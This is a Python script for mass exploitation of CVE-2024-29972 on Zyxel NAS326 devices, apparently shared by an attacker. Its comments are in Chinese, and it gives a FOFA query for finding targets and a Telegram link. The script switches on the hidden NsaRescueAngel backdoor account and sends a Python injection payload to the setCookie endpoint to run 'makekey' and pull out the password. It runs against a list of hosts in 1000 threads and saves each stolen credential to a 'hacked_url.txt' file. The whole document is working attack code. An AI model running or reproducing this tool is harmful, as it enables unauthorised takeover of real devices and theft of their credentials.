#CVE-2024-29972 Zyxel Nas Backdoor Account 后门账户未授权开启
#FOFA app="ZyXEL-NAS326"
# TG https://t.me/WanLiChangChengWanLiChang
import requests
import json
import queue
import threading
import urllib3
from requests.packages.urllib3.exceptions import InsecureRequestWarning

urllib3.disable_warnings(InsecureRequestWarning)

NsaRescueAngel = "NsaRescueAngel"  
output_file = "hacked_url.txt"

def step1(url):
    try:
        response = requests.get(url + "/desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc", verify=False, timeout=10)
        if response.status_code == 200 and "result=0" in response.text:
            return True
    except Exception as e:
        print(f"后门用户检测失败：{url}")
    return False

def step2(url):
    try:
        post_url = url + "/cmd,/simZysh/register_main/setCookie"
        headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        data = 'c0=storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("makekey", shell=True)#'

        response = requests.post(post_url, headers=headers, data=data, verify=False, timeout=10)
        if response.status_code == 200:
            result = response.json()
            if "errno0" in result and result["errno0"] == 0 and "errmsg0" in result and result["errmsg0"] == "OK":
                password = result["zyshdata0"][0].strip()
                print(f"[+]Inject Well : {url}:{NsaRescueAngel}:{password}")
                write_to_file(f"{url}:{NsaRescueAngel}:{password}")
                return True
    except Exception as e:
        print(f"获取密码失败：{url}")
    return False

def write_to_file(content):
    with open(output_file, 'a') as f:
        f.write(content + "\n")

def worker(queue):
    while True:
        url = queue.get()
        if url is None:
            break
        if step1(url):
            if step2(url):
                pass  
        queue.task_done()

if __name__ == "__main__":
    queue = queue.Queue()
    with open("zyxelnas.txt", "r") as file:
        attackips = file.readlines()
        for i in attackips:
            url = i.strip()
            if not url.startswith("http"):
                url = "http://" + url
            queue.put(url)

    threads_count = 1000  
    threads = []
    for _ in range(threads_count):
        t = threading.Thread(target=worker, args=(queue,))
        t.start()
        threads.append(t)

    queue.join()

    for _ in range(threads_count):
        queue.put(None)
    for t in threads:
        t.join()

    print("批量扫描完成，结果已写入到", output_file)